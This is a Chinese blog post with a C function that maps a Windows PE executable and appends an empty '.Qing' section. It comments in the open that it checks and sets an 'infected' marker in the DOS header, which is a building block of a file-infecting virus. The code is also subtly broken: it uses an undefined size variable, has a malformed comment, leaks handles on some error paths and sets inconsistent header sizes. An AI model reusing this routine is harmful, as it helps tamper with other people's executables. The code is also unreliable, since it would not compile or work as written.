Pe增加区段

话说PE增加区段......
//**********************************************

// Method: AddEmptySection

// Returns: BOOL

// Parameter: PCTSTR ptFile 要添加空节的文件路径

// Parameter: UINT uSize 空节的大小

//**********************************************

BOOL AddEmptySection(PCTSTR ptFile,UINT uSize)

{

HANDLE hFile = NULL;

HANDLE hMapping = NULL;

LPVOID bPointer = NULL;

PBYTE pData = NULL;

// 打开源文件

hFile = CreateFile(

ptFile,

GENERIC_READ|GENERIC_WRITE,

FILE_SHARE_READ|FILE_SHARE_WRITE,

NULL,

OPEN_EXISTING,

FILE_FLAG_SEQUENTIAL_SCAN,

NULL);

if (hFile == INVALID_HANDLE_VALUE)

return FALSE;



//内存映射,创建一个有名的共享内存

if (!(hMapping = CreateFileMapping(hFile, 0, PAGE_READWRITE | SEC_COMMIT, 0, dwSize, NULL)))

{

CloseHandle(hFile);

return FALSE;

}


//映射对象视图,进行读写操作

if (!(bPointer = MapViewOfFile(hMapping, FILE_MAP_ALL_ACCESS, 0, 0, dwSize)))

{

CloseHandle(hMapping);

CloseHandle(hFile);

return FALSE;

}


pData = (PBYTE)bPointer;


//检查 DOS特征

if (((PIMAGE_DOS_HEADER) pData)->e_magic != IMAGE_DOS_SIGNATURE)

{

return FALSE;

}


/ /检查文件是否被感染过

if( *(DWORD*)(((PIMAGE_DOS_HEADER) pData)->e_res2) == 19861001)

{ //已感染,跳过

UnmapViewOfFile(bPointer);

CloseHandle(hMapping);

CloseHandle(hFile);

return FALSE;

}

else

{

//设置感染标志

*(DWORD*)(((PIMAGE_DOS_HEADER) pData)->e_res2) = 19861001;

}


//检查 PE 特征

PIMAGE_NT_HEADERS pNTHdr = (PIMAGE_NT_HEADERS) (pData + ((PIMAGE_DOS_HEADER) bPointer)->e_lfanew);

if (pNTHdr->Signature != IMAGE_NT_SIGNATURE)

return FALSE;


// 检查节头(节描述)空间

if ((pNTHdr->FileHeader.NumberOfSections + 1) * sizeof(IMAGE_SECTION_HEADER) > pNTHdr->OptionalHeader.SizeOfHeaders)

return FALSE;


// Calculate code and file delta

DWORD uCodeDelta = ZALIGN(uSize, pNTHdr->OptionalHeader.SectionAlignment);

DWORD dwFileDelta = ZALIGN(uSize, pNTHdr->OptionalHeader.FileAlignment);


// 获得新节头 和前一个节头

PIMAGE_SECTION_HEADER pNewSec = (PIMAGE_SECTION_HEADER) (pNTHdr + 1) + pNTHdr->FileHeader.NumberOfSections;

PIMAGE_SECTION_HEADER pLastSec = pNewSec - 1;


//这里是填充新节头

memcpy(pNewSec->Name, ".Qing", 6);

pNewSec->VirtualAddress = pLastSec->VirtualAddress + ZALIGN(pLastSec->Misc.VirtualSize, pNTHdr->OptionalHeader.SectionAlignment);

pNewSec->PointerToRawData = pLastSec->PointerToRawData + pLastSec->SizeOfRawData;

pNewSec->Misc.VirtualSize = uSize;

pNewSec->SizeOfRawData = 0;//uCodeDelta;

pNewSec->Characteristics = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE ;//节属性


// 修改下IMAGE_NT_HEADERS,增加新节

pNTHdr->FileHeader.NumberOfSections++;

pNTHdr->OptionalHeader.SizeOfCode += uCodeDelta;

pNTHdr->OptionalHeader.SizeOfImage += dwFileDelta;

// pNTHdr->OptionalHeader.AddressOfEntryPoint;//no change here

pNTHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size = 0;

pNTHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress = 0;


UnmapViewOfFile(bPointer); //解除映射

CloseHandle(hMapping);

CloseHandle(hFile);

return TRUE;

}
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值